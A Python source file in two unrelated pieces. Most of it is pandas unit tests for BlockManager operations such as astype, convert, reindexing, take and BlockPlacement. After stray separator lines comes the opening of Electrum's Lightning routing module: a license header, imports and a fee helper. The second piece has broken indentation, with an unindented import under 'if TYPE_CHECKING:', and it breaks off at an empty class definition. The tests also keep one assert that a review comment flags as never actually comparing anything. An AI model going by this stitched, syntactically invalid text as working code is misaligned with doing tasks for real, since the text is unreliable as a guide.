        for t in ['float16', 'float32', 'float64', 'int32', 'int64']:
            t = np.dtype(t)
            tmgr = mgr.astype(t)
            assert tmgr.get('c').dtype.type == t
            assert tmgr.get('d').dtype.type == t
            assert tmgr.get('e').dtype.type == t

        # mixed
        mgr = create_mgr('a,b: object; c: bool; d: datetime;'
                         'e: f4; f: f2; g: f8')
        for t in ['float16', 'float32', 'float64', 'int32', 'int64']:
            t = np.dtype(t)
            # errors='ignore' leaves non-castable blocks untouched
            tmgr = mgr.astype(t, errors='ignore')
            assert tmgr.get('c').dtype.type == t
            assert tmgr.get('e').dtype.type == t
            assert tmgr.get('f').dtype.type == t
            assert tmgr.get('g').dtype.type == t

            assert tmgr.get('a').dtype.type == np.object_
            assert tmgr.get('b').dtype.type == np.object_
            if t != np.int64:
                assert tmgr.get('d').dtype.type == np.datetime64
            else:
                assert tmgr.get('d').dtype.type == t

    def test_convert(self):
        def _compare(old_mgr, new_mgr):
            """ compare the blocks, numeric compare ==, object don't """
            old_blocks = set(old_mgr.blocks)
            new_blocks = set(new_mgr.blocks)
            assert len(old_blocks) == len(new_blocks)

            # compare non-numeric
            for b in old_blocks:
                found = False
                for nb in new_blocks:
                    if (b.values == nb.values).all():
                        found = True
                        break
                assert found

            for b in new_blocks:
                found = False
                for ob in old_blocks:
                    if (b.values == ob.values).all():
                        found = True
                        break
                assert found

        # noops
        mgr = create_mgr('f: i8; g: f8')
        new_mgr = mgr.convert()
        _compare(mgr, new_mgr)

        mgr = create_mgr('a, b: object; f: i8; g: f8')
        new_mgr = mgr.convert()
        _compare(mgr, new_mgr)

        # convert: object columns holding numeric strings become numeric
        mgr = create_mgr('a,b,foo: object; f: i8; g: f8')
        mgr.set('a', np.array(['1'] * N, dtype=np.object_))
        mgr.set('b', np.array(['2.'] * N, dtype=np.object_))
        mgr.set('foo', np.array(['foo.'] * N, dtype=np.object_))
        new_mgr = mgr.convert(numeric=True)
        assert new_mgr.get('a').dtype == np.int64
        assert new_mgr.get('b').dtype == np.float64
        assert new_mgr.get('foo').dtype == np.object_
        assert new_mgr.get('f').dtype == np.int64
        assert new_mgr.get('g').dtype == np.float64

        mgr = create_mgr('a,b,foo: object; f: i4; bool: bool; dt: datetime;'
                         'i: i8; g: f8; h: f2')
        mgr.set('a', np.array(['1'] * N, dtype=np.object_))
        mgr.set('b', np.array(['2.'] * N, dtype=np.object_))
        mgr.set('foo', np.array(['foo.'] * N, dtype=np.object_))
        new_mgr = mgr.convert(numeric=True)
        assert new_mgr.get('a').dtype == np.int64
        assert new_mgr.get('b').dtype == np.float64
        assert new_mgr.get('foo').dtype == np.object_
        assert new_mgr.get('f').dtype == np.int32
        assert new_mgr.get('bool').dtype == np.bool_
        # NOTE(review): the comma below makes this `assert <expr>, <msg>` --
        # np.datetime64 is the assert *message*, not a comparison.  Almost
        # certainly intended to be `== np.datetime64`; left as-is here.
        assert new_mgr.get('dt').dtype.type, np.datetime64
        assert new_mgr.get('i').dtype == np.int64
        assert new_mgr.get('g').dtype == np.float64
        assert new_mgr.get('h').dtype == np.float16

    def test_interleave(self):

        # self
        for dtype in ['f8', 'i8', 'object', 'bool', 'complex', 'M8[ns]',
                      'm8[ns]']:
            mgr = create_mgr('a: {0}'.format(dtype))
            assert mgr.as_matrix().dtype == dtype
            mgr = create_mgr('a: {0}; b: {0}'.format(dtype))
            assert mgr.as_matrix().dtype == dtype

        # will be converted according the actual dtype of the underlying
        mgr = create_mgr('a: category')
        assert mgr.as_matrix().dtype == 'i8'
        mgr = create_mgr('a: category; b: category')
        assert mgr.as_matrix().dtype == 'i8'
        mgr = create_mgr('a: category; b: category2')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: category2')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: category2; b: category2')
        assert mgr.as_matrix().dtype == 'object'

        # combinations
        mgr = create_mgr('a: f8')
        assert mgr.as_matrix().dtype == 'f8'
        mgr = create_mgr('a: f8; b: i8')
        assert mgr.as_matrix().dtype == 'f8'
        mgr = create_mgr('a: f4; b: i8')
        assert mgr.as_matrix().dtype == 'f8'
        mgr = create_mgr('a: f4; b: i8; d: object')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: bool; b: i8')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: complex')
        assert mgr.as_matrix().dtype == 'complex'
        mgr = create_mgr('a: f8; b: category')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: M8[ns]; b: category')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: M8[ns]; b: bool')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: M8[ns]; b: i8')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: m8[ns]; b: bool')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: m8[ns]; b: i8')
        assert mgr.as_matrix().dtype == 'object'
        mgr = create_mgr('a: M8[ns]; b: m8[ns]')
        assert mgr.as_matrix().dtype == 'object'

    def test_interleave_non_unique_cols(self):
        df = DataFrame([
            [pd.Timestamp('20130101'), 3.5],
            [pd.Timestamp('20130102'), 4.5]],
            columns=['x', 'x'],
            index=[1, 2])

        df_unique = df.copy()
        df_unique.columns = ['x', 'y']
        assert df_unique.values.shape == df.values.shape
        tm.assert_numpy_array_equal(df_unique.values[0], df.values[0])
        tm.assert_numpy_array_equal(df_unique.values[1], df.values[1])

    def test_consolidate(self):
        pass

    def test_consolidate_ordering_issues(self, mgr):
        mgr.set('f', randn(N))
        mgr.set('d', randn(N))
        mgr.set('b', randn(N))
        mgr.set('g', randn(N))
        mgr.set('h', randn(N))

        # we have datetime/tz blocks in mgr
        cons = mgr.consolidate()
        assert cons.nblocks == 4
        cons = mgr.consolidate().get_numeric_data()
        assert cons.nblocks == 1
        assert isinstance(cons.blocks[0].mgr_locs, lib.BlockPlacement)
        tm.assert_numpy_array_equal(cons.blocks[0].mgr_locs.as_array,
                                    np.arange(len(cons.items), dtype=np.int64))

    def test_reindex_index(self):
        pass

    def test_reindex_items(self):
        # mgr is not consolidated, f8 & f8-2 blocks
        mgr = create_mgr('a: f8; b: i8; c: f8; d: i8; e: f8;'
                         'f: bool; g: f8-2')

        reindexed = mgr.reindex_axis(['g', 'c', 'a', 'd'], axis=0)
        assert reindexed.nblocks == 2
        tm.assert_index_equal(reindexed.items, pd.Index(['g', 'c', 'a', 'd']))
        assert_almost_equal(
            mgr.get('g', fastpath=False), reindexed.get('g', fastpath=False))
        assert_almost_equal(
            mgr.get('c', fastpath=False), reindexed.get('c', fastpath=False))
        assert_almost_equal(
            mgr.get('a', fastpath=False), reindexed.get('a', fastpath=False))
        assert_almost_equal(
            mgr.get('d', fastpath=False), reindexed.get('d', fastpath=False))
        assert_almost_equal(
            mgr.get('g').internal_values(),
            reindexed.get('g').internal_values())
        assert_almost_equal(
            mgr.get('c').internal_values(),
            reindexed.get('c').internal_values())
        assert_almost_equal(
            mgr.get('a').internal_values(),
            reindexed.get('a').internal_values())
        assert_almost_equal(
            mgr.get('d').internal_values(),
            reindexed.get('d').internal_values())

    def test_multiindex_xs(self):
        mgr = create_mgr('a,b,c: f8; d,e,f: i8')

        index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'], ['one', 'two',
                                                                  'three']],
                           labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
                                   [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
                           names=['first', 'second'])

        mgr.set_axis(1, index)
        result = mgr.xs('bar', axis=1)
        assert result.shape == (6, 2)
        assert result.axes[1][0] == ('bar', 'one')
        assert result.axes[1][1] == ('bar', 'two')

    def test_get_numeric_data(self):
        mgr = create_mgr('int: int; float: float; complex: complex;'
                         'str: object; bool: bool; obj: object; dt: datetime',
                         item_shape=(3, ))
        mgr.set('obj', np.array([1, 2, 3], dtype=np.object_))

        numeric = mgr.get_numeric_data()
        tm.assert_index_equal(numeric.items,
                              pd.Index(['int', 'float', 'complex', 'bool']))
        assert_almost_equal(
            mgr.get('float', fastpath=False), numeric.get('float',
                                                          fastpath=False))
        assert_almost_equal(
            mgr.get('float').internal_values(),
            numeric.get('float').internal_values())

        # Check sharing: default get_numeric_data returns views
        numeric.set('float', np.array([100., 200., 300.]))
        assert_almost_equal(
            mgr.get('float', fastpath=False), np.array([100., 200., 300.]))
        assert_almost_equal(
            mgr.get('float').internal_values(), np.array([100., 200., 300.]))

        numeric2 = mgr.get_numeric_data(copy=True)
        tm.assert_index_equal(numeric.items,
                              pd.Index(['int', 'float', 'complex', 'bool']))
        # copy=True: mutating the result must not touch the original
        numeric2.set('float', np.array([1000., 2000., 3000.]))
        assert_almost_equal(
            mgr.get('float', fastpath=False), np.array([100., 200., 300.]))
        assert_almost_equal(
            mgr.get('float').internal_values(), np.array([100., 200., 300.]))

    def test_get_bool_data(self):
        mgr = create_mgr('int: int; float: float; complex: complex;'
                         'str: object; bool: bool; obj: object; dt: datetime',
                         item_shape=(3, ))
        mgr.set('obj', np.array([True, False, True], dtype=np.object_))

        bools = mgr.get_bool_data()
        tm.assert_index_equal(bools.items, pd.Index(['bool']))
        assert_almost_equal(mgr.get('bool', fastpath=False),
                            bools.get('bool', fastpath=False))
        assert_almost_equal(
            mgr.get('bool').internal_values(),
            bools.get('bool').internal_values())

        bools.set('bool', np.array([True, False, True]))
        tm.assert_numpy_array_equal(mgr.get('bool', fastpath=False),
                                    np.array([True, False, True]))
        tm.assert_numpy_array_equal(mgr.get('bool').internal_values(),
                                    np.array([True, False, True]))

        # Check sharing: copy=True must not write through to the original
        bools2 = mgr.get_bool_data(copy=True)
        bools2.set('bool', np.array([False, True, False]))
        tm.assert_numpy_array_equal(mgr.get('bool', fastpath=False),
                                    np.array([True, False, True]))
        tm.assert_numpy_array_equal(mgr.get('bool').internal_values(),
                                    np.array([True, False, True]))

    def test_unicode_repr_doesnt_raise(self):
        repr(create_mgr(u('b,\u05d0: object')))

    def test_missing_unicode_key(self):
        df = DataFrame({"a": [1]})
        try:
            df.loc[:, u("\u05d0")]  # should not raise UnicodeEncodeError
        except KeyError:
            pass  # this is the expected exception

    def test_equals(self):
        # unique items
        bm1 = create_mgr('a,b,c: i8-1; d,e,f: i8-2')
        bm2 = BlockManager(bm1.blocks[::-1], bm1.axes)
        assert bm1.equals(bm2)

        bm1 = create_mgr('a,a,a: i8-1; b,b,b: i8-2')
        bm2 = BlockManager(bm1.blocks[::-1], bm1.axes)
        assert bm1.equals(bm2)

    def test_equals_block_order_different_dtypes(self):
        # GH 9330: equality must be independent of block order
        mgr_strings = [
            "a:i8;b:f8",  # basic case
            "a:i8;b:f8;c:c8;d:b",  # many types
            "a:i8;e:dt;f:td;g:string",  # more types
            "a:i8;b:category;c:category2;d:category2",  # categories
            "c:sparse;d:sparse_na;b:f8",  # sparse
        ]

        for mgr_string in mgr_strings:
            bm = create_mgr(mgr_string)
            block_perms = itertools.permutations(bm.blocks)
            for bm_perm in block_perms:
                bm_this = BlockManager(bm_perm, bm.axes)
                assert bm.equals(bm_this)
                assert bm_this.equals(bm)

    def test_single_mgr_ctor(self):
        mgr = create_single_mgr('f8', num_rows=5)
        assert mgr.as_matrix().tolist() == [0., 1., 2., 3., 4.]

    def test_validate_bool_args(self):
        # non-bool `inplace` values must be rejected
        invalid_values = [1, "True", [1, 2, 3], 5.0]
        bm1 = create_mgr('a,b,c: i8-1; d,e,f: i8-2')

        for value in invalid_values:
            with pytest.raises(ValueError):
                bm1.replace_list([1], [2], inplace=value)
class TestIndexing(object):
    # Nosetests-style data-driven tests.
    #
    # This test applies different indexing routines to block managers and
    # compares the outcome to the result of same operations on np.ndarray.
    #
    # NOTE: sparse (SparseBlock with fill_value != np.nan) fail a lot of tests
    # and are disabled.

    # Managers under test, built once at class-definition time and shared
    # read-only by all test methods: 1-dim, 2-dim and 3-dim shapes, with
    # homogeneous and mixed dtypes (N is a module-level size constant).
    MANAGERS = [
        create_single_mgr('f8', N),
        create_single_mgr('i8', N),
        # create_single_mgr('sparse', N),
        create_single_mgr('sparse_na', N),
        # 2-dim
        create_mgr('a,b,c,d,e,f: f8', item_shape=(N,)),
        create_mgr('a,b,c,d,e,f: i8', item_shape=(N,)),
        create_mgr('a,b: f8; c,d: i8; e,f: string', item_shape=(N,)),
        create_mgr('a,b: f8; c,d: i8; e,f: f8', item_shape=(N,)),
        # create_mgr('a: sparse', item_shape=(N,)),
        create_mgr('a: sparse_na', item_shape=(N,)),
        # 3-dim
        create_mgr('a,b,c,d,e,f: f8', item_shape=(N, N)),
        create_mgr('a,b,c,d,e,f: i8', item_shape=(N, N)),
        create_mgr('a,b: f8; c,d: i8; e,f: string', item_shape=(N, N)),
        create_mgr('a,b: f8; c,d: i8; e,f: f8', item_shape=(N, N)),
        # create_mgr('a: sparse', item_shape=(1, N)),
    ]
    # MANAGERS = [MANAGERS[6]]

    def test_get_slice(self):
        """get_slice with slices, boolean masks and fancy indexers must match
        the equivalent operation on the dense ndarray."""
        def assert_slice_ok(mgr, axis, slobj):
            mat = mgr.as_matrix()
            # we maybe using an ndarray to test slicing and
            # might not be the full length of the axis
            if isinstance(slobj, np.ndarray):
                ax = mgr.axes[axis]
                # pad a short boolean mask with False up to the axis length
                if len(ax) and len(slobj) and len(slobj) != len(ax):
                    slobj = np.concatenate([slobj, np.zeros(
                        len(ax) - len(slobj), dtype=bool)])
            sliced = mgr.get_slice(slobj, axis=axis)
            # build the equivalent ndarray indexing tuple for this axis
            mat_slobj = (slice(None), ) * axis + (slobj, )
            tm.assert_numpy_array_equal(mat[mat_slobj], sliced.as_matrix(),
                                        check_dtype=False)
            tm.assert_index_equal(mgr.axes[axis][slobj], sliced.axes[axis])
        for mgr in self.MANAGERS:
            for ax in range(mgr.ndim):
                # slice
                assert_slice_ok(mgr, ax, slice(None))
                assert_slice_ok(mgr, ax, slice(3))
                assert_slice_ok(mgr, ax, slice(100))
                assert_slice_ok(mgr, ax, slice(1, 4))
                assert_slice_ok(mgr, ax, slice(3, 0, -2))
                # boolean mask
                assert_slice_ok(
                    mgr, ax, np.array([], dtype=np.bool_))
                assert_slice_ok(
                    mgr, ax,
                    np.ones(mgr.shape[ax], dtype=np.bool_))
                assert_slice_ok(
                    mgr, ax,
                    np.zeros(mgr.shape[ax], dtype=np.bool_))
                if mgr.shape[ax] >= 3:
                    assert_slice_ok(
                        mgr, ax,
                        np.arange(mgr.shape[ax]) % 3 == 0)
                    assert_slice_ok(
                        mgr, ax, np.array(
                            [True, True, False], dtype=np.bool_))
                # fancy indexer
                assert_slice_ok(mgr, ax, [])
                assert_slice_ok(mgr, ax, lrange(mgr.shape[ax]))
                if mgr.shape[ax] >= 3:
                    assert_slice_ok(mgr, ax, [0, 1, 2])
                    assert_slice_ok(mgr, ax, [-1, -2, -3])

    def test_take(self):
        """take with positional (possibly negative/repeated) indexers must
        match np.take on the dense ndarray."""
        def assert_take_ok(mgr, axis, indexer):
            mat = mgr.as_matrix()
            taken = mgr.take(indexer, axis)
            tm.assert_numpy_array_equal(np.take(mat, indexer, axis),
                                        taken.as_matrix(), check_dtype=False)
            tm.assert_index_equal(mgr.axes[axis].take(indexer),
                                  taken.axes[axis])
        for mgr in self.MANAGERS:
            for ax in range(mgr.ndim):
                # take/fancy indexer
                assert_take_ok(mgr, ax, [])
                assert_take_ok(mgr, ax, [0, 0, 0])
                assert_take_ok(mgr, ax, lrange(mgr.shape[ax]))
                if mgr.shape[ax] >= 3:
                    assert_take_ok(mgr, ax, [0, 1, 2])
                    assert_take_ok(mgr, ax, [-1, -2, -3])

    def test_reindex_axis(self):
        """reindex_axis against new labels (empty/identity/dupes/missing) must
        match algos.take_nd on the dense ndarray, for each fill_value."""
        def assert_reindex_axis_is_ok(mgr, axis, new_labels, fill_value):
            mat = mgr.as_matrix()
            indexer = mgr.axes[axis].get_indexer_for(new_labels)
            reindexed = mgr.reindex_axis(new_labels, axis,
                                         fill_value=fill_value)
            tm.assert_numpy_array_equal(algos.take_nd(mat, indexer, axis,
                                                      fill_value=fill_value),
                                        reindexed.as_matrix(),
                                        check_dtype=False)
            tm.assert_index_equal(reindexed.axes[axis], new_labels)
        for mgr in self.MANAGERS:
            for ax in range(mgr.ndim):
                for fill_value in (None, np.nan, 100.):
                    assert_reindex_axis_is_ok(
                        mgr, ax,
                        pd.Index([]), fill_value)
                    assert_reindex_axis_is_ok(
                        mgr, ax, mgr.axes[ax],
                        fill_value)
                    assert_reindex_axis_is_ok(
                        mgr, ax,
                        mgr.axes[ax][[0, 0, 0]], fill_value)
                    assert_reindex_axis_is_ok(
                        mgr, ax,
                        pd.Index(['foo', 'bar', 'baz']), fill_value)
                    assert_reindex_axis_is_ok(
                        mgr, ax,
                        pd.Index(['foo', mgr.axes[ax][0], 'baz']),
                        fill_value)
                    if mgr.shape[ax] >= 3:
                        assert_reindex_axis_is_ok(
                            mgr, ax,
                            mgr.axes[ax][:-3], fill_value)
                        assert_reindex_axis_is_ok(
                            mgr, ax,
                            mgr.axes[ax][-3::-1], fill_value)
                        assert_reindex_axis_is_ok(
                            mgr, ax,
                            mgr.axes[ax][[0, 1, 2, 0, 1, 2]], fill_value)

    def test_reindex_indexer(self):
        """reindex_indexer with explicit (labels, indexer) pairs (including -1
        'missing' entries) must match algos.take_nd on the dense ndarray."""
        def assert_reindex_indexer_is_ok(mgr, axis, new_labels, indexer,
                                         fill_value):
            mat = mgr.as_matrix()
            reindexed_mat = algos.take_nd(mat, indexer, axis,
                                          fill_value=fill_value)
            reindexed = mgr.reindex_indexer(new_labels, indexer, axis,
                                            fill_value=fill_value)
            tm.assert_numpy_array_equal(reindexed_mat,
                                        reindexed.as_matrix(),
                                        check_dtype=False)
            tm.assert_index_equal(reindexed.axes[axis], new_labels)
        for mgr in self.MANAGERS:
            for ax in range(mgr.ndim):
                for fill_value in (None, np.nan, 100.):
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        pd.Index([]), [], fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        mgr.axes[ax], np.arange(mgr.shape[ax]), fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        pd.Index(['foo'] * mgr.shape[ax]),
                        np.arange(mgr.shape[ax]), fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        mgr.axes[ax][::-1], np.arange(mgr.shape[ax]),
                        fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax, mgr.axes[ax],
                        np.arange(mgr.shape[ax])[::-1], fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        pd.Index(['foo', 'bar', 'baz']),
                        [0, 0, 0], fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        pd.Index(['foo', 'bar', 'baz']),
                        [-1, 0, -1], fill_value)
                    assert_reindex_indexer_is_ok(
                        mgr, ax,
                        pd.Index(['foo', mgr.axes[ax][0], 'baz']),
                        [-1, -1, -1], fill_value)
                    if mgr.shape[ax] >= 3:
                        assert_reindex_indexer_is_ok(
                            mgr, ax,
                            pd.Index(['foo', 'bar', 'baz']),
                            [0, 1, 2], fill_value)
    # test_get_slice(slice_like, axis)
    # take(indexer, axis)
    # reindex_axis(new_labels, axis)
    # reindex_indexer(new_labels, indexer, axis)
class TestBlockPlacement(object):
    """Unit tests for BlockPlacement: slice/array interconversion, length,
    iteration and integer-offset addition."""

    def test_slice_len(self):
        assert len(BlockPlacement(slice(0, 4))) == 4
        assert len(BlockPlacement(slice(0, 4, 2))) == 2
        assert len(BlockPlacement(slice(0, 3, 2))) == 2
        assert len(BlockPlacement(slice(0, 1, 2))) == 1
        assert len(BlockPlacement(slice(1, 0, -1))) == 1

    def test_zero_step_raises(self):
        # a zero step is never a valid slice
        with pytest.raises(ValueError):
            BlockPlacement(slice(1, 1, 0))
        with pytest.raises(ValueError):
            BlockPlacement(slice(1, 2, 0))

    def test_unbounded_slice_raises(self):
        """Slices whose meaning depends on the container length must be
        rejected."""
        def assert_unbounded_slice_error(slc):
            tm.assert_raises_regex(ValueError, "unbounded slice",
                                   lambda: BlockPlacement(slc))
        assert_unbounded_slice_error(slice(None, None))
        assert_unbounded_slice_error(slice(10, None))
        assert_unbounded_slice_error(slice(None, None, -1))
        assert_unbounded_slice_error(slice(None, 10, -1))
        # These are "unbounded" because negative index will change depending on
        # container shape.
        assert_unbounded_slice_error(slice(-1, None))
        assert_unbounded_slice_error(slice(None, -1))
        assert_unbounded_slice_error(slice(-1, -1))
        assert_unbounded_slice_error(slice(-1, None, -1))
        assert_unbounded_slice_error(slice(None, -1, -1))
        assert_unbounded_slice_error(slice(-1, -1, -1))

    def test_not_slice_like_slices(self):
        """Empty or degenerate slices are stored but not reported as
        slice-like."""
        def assert_not_slice_like(slc):
            assert not BlockPlacement(slc).is_slice_like
        assert_not_slice_like(slice(0, 0))
        assert_not_slice_like(slice(100, 0))
        assert_not_slice_like(slice(100, 100, -1))
        assert_not_slice_like(slice(0, 100, -1))
        assert not BlockPlacement(slice(0, 0)).is_slice_like
        assert not BlockPlacement(slice(100, 100)).is_slice_like

    def test_array_to_slice_conversion(self):
        """Arithmetic-progression arrays must be recognized and stored as the
        equivalent slice."""
        def assert_as_slice_equals(arr, slc):
            assert BlockPlacement(arr).as_slice == slc
        assert_as_slice_equals([0], slice(0, 1, 1))
        assert_as_slice_equals([100], slice(100, 101, 1))
        assert_as_slice_equals([0, 1, 2], slice(0, 3, 1))
        assert_as_slice_equals([0, 5, 10], slice(0, 15, 5))
        assert_as_slice_equals([0, 100], slice(0, 200, 100))
        assert_as_slice_equals([2, 1], slice(2, 0, -1))
        # NOTE(review): gated off on PY361 — presumably a Python 3.6.1
        # behavior difference around negative-step slice canonicalization
        if not PY361:
            assert_as_slice_equals([2, 1, 0], slice(2, None, -1))
            assert_as_slice_equals([100, 0], slice(100, None, -100))

    def test_not_slice_like_arrays(self):
        """Arrays with negative entries or non-constant step are kept as
        arrays, not converted to slices."""
        def assert_not_slice_like(arr):
            assert not BlockPlacement(arr).is_slice_like
        assert_not_slice_like([])
        assert_not_slice_like([-1])
        assert_not_slice_like([-1, -2, -3])
        assert_not_slice_like([-10])
        assert_not_slice_like([-1])
        assert_not_slice_like([-1, 0, 1, 2])
        assert_not_slice_like([-2, 0, 2, 4])
        assert_not_slice_like([1, 0, -1])
        assert_not_slice_like([1, 1, 1])

    def test_slice_iter(self):
        assert list(BlockPlacement(slice(0, 3))) == [0, 1, 2]
        assert list(BlockPlacement(slice(0, 0))) == []
        assert list(BlockPlacement(slice(3, 0))) == []
        if not PY361:
            assert list(BlockPlacement(slice(3, 0, -1))) == [3, 2, 1]
            assert list(BlockPlacement(slice(3, None, -1))) == [3, 2, 1, 0]

    def test_slice_to_array_conversion(self):
        """as_array must expand the stored slice to an int64 ndarray."""
        def assert_as_array_equals(slc, asarray):
            tm.assert_numpy_array_equal(
                BlockPlacement(slc).as_array,
                np.asarray(asarray, dtype=np.int64))
        assert_as_array_equals(slice(0, 3), [0, 1, 2])
        assert_as_array_equals(slice(0, 0), [])
        assert_as_array_equals(slice(3, 0), [])
        assert_as_array_equals(slice(3, 0, -1), [3, 2, 1])
        if not PY361:
            assert_as_array_equals(slice(3, None, -1), [3, 2, 1, 0])
            assert_as_array_equals(slice(31, None, -10), [31, 21, 11, 1])

    def test_blockplacement_add(self):
        # add() accepts an int offset or an array of per-element offsets
        bpl = BlockPlacement(slice(0, 5))
        assert bpl.add(1).as_slice == slice(1, 6, 1)
        assert bpl.add(np.arange(5)).as_slice == slice(0, 10, 2)
        assert list(bpl.add(np.arange(5, 0, -1))) == [5, 5, 5, 5, 5]

    def test_blockplacement_add_int(self):
        """Integer add() must shift every position; shifts that would produce
        a negative position raise ValueError."""
        def assert_add_equals(val, inc, result):
            assert list(BlockPlacement(val).add(inc)) == result
        assert_add_equals(slice(0, 0), 0, [])
        assert_add_equals(slice(1, 4), 0, [1, 2, 3])
        assert_add_equals(slice(3, 0, -1), 0, [3, 2, 1])
        assert_add_equals([1, 2, 4], 0, [1, 2, 4])
        assert_add_equals(slice(0, 0), 10, [])
        assert_add_equals(slice(1, 4), 10, [11, 12, 13])
        assert_add_equals(slice(3, 0, -1), 10, [13, 12, 11])
        assert_add_equals([1, 2, 4], 10, [11, 12, 14])
        assert_add_equals(slice(0, 0), -1, [])
        assert_add_equals(slice(1, 4), -1, [0, 1, 2])
        assert_add_equals([1, 2, 4], -1, [0, 1, 3])
        # shifting below zero is invalid
        with pytest.raises(ValueError):
            BlockPlacement(slice(1, 4)).add(-10)
        with pytest.raises(ValueError):
            BlockPlacement([1, 2, 4]).add(-10)
        if not PY361:
            assert_add_equals(slice(3, 0, -1), -1, [2, 1, 0])
            assert_add_equals(slice(2, None, -1), 0, [2, 1, 0])
            assert_add_equals(slice(2, None, -1), 10, [12, 11, 10])
            with pytest.raises(ValueError):
                BlockPlacement(slice(2, None, -1)).add(-1)
class DummyElement(object):
    """Scalar-like stand-in with a controllable numpy dtype.

    Converts to a 0-d numpy array via __array__ and mimics the small slice of
    the numpy scalar API (astype/view/any) that the block code touches.
    """
    def __init__(self, value, dtype):
        self.value = value
        self.dtype = np.dtype(dtype)
    def __array__(self):
        # numpy conversion hook: 0-d array of the configured dtype
        return np.array(self.value, dtype=self.dtype)
    def __str__(self):
        return "DummyElement({}, {})".format(self.value, self.dtype)
    def __repr__(self):
        return str(self)
    def astype(self, dtype, copy=False):
        # NOTE: mutates self and returns it (no copy), unlike numpy's astype;
        # 'copy' is accepted for signature compatibility but ignored
        self.dtype = dtype
        return self
    def view(self, dtype):
        # assumes self.value itself supports .view (e.g. a numpy scalar)
        return type(self)(self.value.view(dtype), dtype)
    def any(self, axis=None):
        return bool(self.value)
class TestCanHoldElement(object):
    """Binary ops between a DataFrame and an array-convertible scalar-like
    object must produce the same result dtypes as the raw scalar."""
    @pytest.mark.parametrize('value, dtype', [
        (1, 'i8'),
        (1.0, 'f8'),
        (1j, 'complex128'),
        (True, 'bool'),
        (np.timedelta64(20, 'ns'), '<m8[ns]'),
        (np.datetime64(20, 'ns'), '<M8[ns]'),
    ])
    @pytest.mark.parametrize('op', [
        operator.add,
        operator.sub,
        operator.mul,
        operator.truediv,
        operator.mod,
        operator.pow,
    ], ids=lambda x: x.__name__)
    def test_binop_other(self, op, value, dtype):
        # (op, dtype) pairs that are not defined / not supported are skipped
        skip = {(operator.add, 'bool'),
                (operator.sub, 'bool'),
                (operator.mul, 'bool'),
                (operator.truediv, 'bool'),
                (operator.mod, 'i8'),
                (operator.mod, 'complex128'),
                (operator.mod, '<M8[ns]'),
                (operator.mod, '<m8[ns]'),
                (operator.pow, 'bool')}
        if (op, dtype) in skip:
            pytest.skip("Invalid combination {},{}".format(op, dtype))
        e = DummyElement(value, dtype)
        s = pd.DataFrame({"A": [e.value, e.value]}, dtype=e.dtype)
        # result dtype with the wrapped element must equal the dtype
        # obtained with the raw scalar value
        result = op(s, e).dtypes
        expected = op(s, value).dtypes
        assert_series_equal(result, expected)
|
|
# -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
from collections import defaultdict
from typing import Sequence, Tuple, Optional, Dict, TYPE_CHECKING, Set
import time
from threading import RLock
import attr
from math import inf
from .util import profiler, with_lock, bh2u
from .logging import Logger
from .lnutil import (NUM_MAX_EDGES_IN_PAYMENT_PATH, ShortChannelID, LnFeatures,
NBLOCK_CLTV_EXPIRY_TOO_FAR_INTO_FUTURE)
from .channel_db import ChannelDB, Policy, NodeInfo
if TYPE_CHECKING:
from .lnchannel import Channel
# Penalty parameters used by the pathfinding cost function when we have no
# recorded liquidity information for a channel:
DEFAULT_PENALTY_BASE_MSAT = 500  # base fee penalty (msat) for unknown sending capability of a channel
DEFAULT_PENALTY_PROPORTIONAL_MILLIONTH = 100  # relative fee penalty (parts-per-million) for unknown sending capability of a channel
BLACKLIST_DURATION = 3600  # how long (in seconds) a channel remains blacklisted
HINT_DURATION = 3600  # how long (in seconds) a liquidity hint remains valid
class NoChannelPolicy(Exception):
    """Raised when no routing policy can be found for a channel."""

    def __init__(self, short_channel_id: bytes):
        scid = ShortChannelID.normalize(short_channel_id)
        message = f'cannot find channel policy for short_channel_id: {scid}'
        super().__init__(message)
class LNPathInconsistent(Exception): pass
def fee_for_edge_msat(forwarded_amount_msat: int, fee_base_msat: int, fee_proportional_millionths: int) -> int:
    """Return the routing fee (in msat) for forwarding the given amount:
    a fixed base fee plus a proportional part expressed in parts-per-million.
    """
    proportional_fee = forwarded_amount_msat * fee_proportional_millionths // 1_000_000
    return fee_base_msat + proportional_fee
@attr.s(slots=True)
class PathEdge:
